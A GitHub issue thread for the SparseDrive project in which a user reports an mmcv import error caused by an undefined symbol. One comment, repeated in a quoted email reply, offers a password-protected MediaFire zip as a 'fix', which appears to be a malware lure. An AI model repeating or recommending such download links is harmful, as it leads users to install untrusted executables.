### ISSUE TITLE
mmcv error

### ISSUE THREAD

**Issue by yeyueluke** [swc-17/SparseDrive#34]
hi, when execute:
sh scripts/create_data.sh 
it gives out errors below: 
/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmcv/__init__.py:20: UserWarning: On January 1, 2023, MMCV will release v2.0.0, in which it will remove components related to the training process and add a data transformation module. In addition, it will rename the package names mmcv to mmcv-lite and mmcv-full to mmcv. See https://github.com/open-mmlab/mmcv/blob/master/docs/en/compatibility.md for more details.
  warnings.warn(
Traceback (most recent call last):
  File "tools/data_converter/nuscenes_converter.py", line 22, in <module>
    from projects.mmdet3d_plugin.datasets.map_utils.nuscmap_extractor import NuscMapExtractor
  File "/mnt/data/github_src/SparseDrive/projects/mmdet3d_plugin/__init__.py", line 1, in <module>
    from .datasets import *
  File "/mnt/data/github_src/SparseDrive/projects/mmdet3d_plugin/datasets/__init__.py", line 1, in <module>
    from .nuscenes_3d_dataset import NuScenes3DDataset
  File "/mnt/data/github_src/SparseDrive/projects/mmdet3d_plugin/datasets/nuscenes_3d_dataset.py", line 21, in <module>
    from mmdet.datasets import DATASETS
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/datasets/__init__.py", line 2, in <module>
    from .builder import DATASETS, PIPELINES, build_dataloader, build_dataset
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/datasets/builder.py", line 15, in <module>
    from .samplers import (ClassAwareSampler, DistributedGroupSampler,
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/datasets/samplers/__init__.py", line 2, in <module>
    from .class_aware_sampler import ClassAwareSampler
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/datasets/samplers/class_aware_sampler.py", line 8, in <module>
    from mmdet.core.utils import sync_random_seed
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/core/__init__.py", line 3, in <module>
    from .bbox import *  # noqa: F401, F403
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/core/bbox/__init__.py", line 8, in <module>
    from .samplers import (BaseSampler, CombinedSampler,
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/core/bbox/samplers/__init__.py", line 12, in <module>
    from .score_hlr_sampler import ScoreHLRSampler
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmdet/core/bbox/samplers/score_hlr_sampler.py", line 3, in <module>
    from mmcv.ops import nms_match
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmcv/ops/__init__.py", line 3, in <module>
    from .active_rotated_filter import active_rotated_filter
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmcv/ops/active_rotated_filter.py", line 10, in <module>
    ext_module = ext_loader.load_ext(
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmcv/utils/ext_loader.py", line 13, in load_ext
    ext = importlib.import_module('mmcv.' + name)
  File "/mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
ImportError: /mnt/data/miniconda3/envs/sparsedrive/lib/python3.8/site-packages/mmcv/_ext.cpython-38-x86_64-linux-gnu.so: undefined symbol: __cxa_call_terminate
(sparsedrive) hoo@hoo-Lenovo-ThinkBook-16p-Gen-4:/mnt/data/github_src/SparseDrive$ pip list |grep mmcv
mmcv-full                  1.7.1

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yeyueluke** [comment]
i am working on linux ,not windows,your files are windows



---- Replied Message ----
| From | ***@***.***> |
| Date | 08/29/2024 12:16 |
| To | ***@***.***> |
| Cc | ***@***.***>***@***.***> |
| Subject | Re: [swc-17/SparseDrive] mmcv error (Issue #34) |

Download
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yeyueluke** [comment]
> Try to reinstall mmcv, make sure the versions of torch, mmcv, cuda etc. are aligned with ours.

as you see, the mmcv version is the same as in requirement.txt is 1.7.1
